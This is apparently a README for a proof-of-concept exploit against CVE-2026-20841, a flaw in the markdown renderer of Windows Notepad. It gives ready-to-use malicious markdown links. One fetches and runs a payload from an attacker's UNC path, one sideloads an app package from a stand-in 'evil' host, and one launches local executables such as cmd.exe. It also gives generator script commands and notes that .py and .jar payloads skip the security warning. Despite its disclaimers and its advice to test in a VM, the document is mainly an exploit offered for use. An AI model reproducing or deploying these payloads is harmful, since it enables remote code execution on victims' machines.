## https://sploitus.com/exploit?id=D8AE7ACD-3CD1-511C-A2CC-B6A8E91080C4
# CVE-2026-20841 - Windows Notepad RCE
PoC for a remote code execution flaw in Windows Notepad's markdown renderer. The markdown engine does not restrict URL protocols, allowing arbitrary protocol handlers to be triggered via clickable links.
## Disclaimers
1. **Not my discovery.** Credit goes to the original researchers on the [MSRC advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841). This is a PoC recreation.
2. **Lower severity than it sounds.** Requires more than one click in most cases (see [Limitations](#limitations)). Built this because "Notepad RCE" is too funny to pass up.
## Attack Vectors
### 1. Remote Payload (`file:///`)
```markdown
[click](file:///\\attacker@5005\payload.py)
```
The `file:///` protocol resolves remote UNC paths. Link a payload and Windows will fetch and execute it on click.
### 2. App Sideloading (`ms-appinstaller://`)
```markdown
[click](ms-appinstaller://?source=https://evil/xxx.appx)
```
Opens App Installer with an attacker-supplied `.appx`/`.msix` package.
### 3. Local Binary Execution (`file://`)
```markdown
[click](file://C:/windows/system32/cmd.exe)
```
Launches any executable already on disk โ `cmd.exe`, `powershell.exe`, `mshta.exe`, etc.
## Usage
Both scripts generate a `poc.md` with a crafted link in the current directory.
```bash
node poc.js
python poc.py
```
```bash
# example
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
```
Test payloads in [`payloads/`](payloads).
## Limitations
1. **Dangerous extensions are still flagged.** `.exe`, `.lnk`, `.vbs` and similar trigger a Windows security warning regardless of Notepad's behavior.
2. **Interpreter extensions bypass the warning.** `.py` and `.jar` execute silently if Python or Java is installed on the target.
## Notes
- Vulnerable Notepad builds are on Uptodown. Verify the digital signature before use.
- **Test only in a VM.**
Stay safe!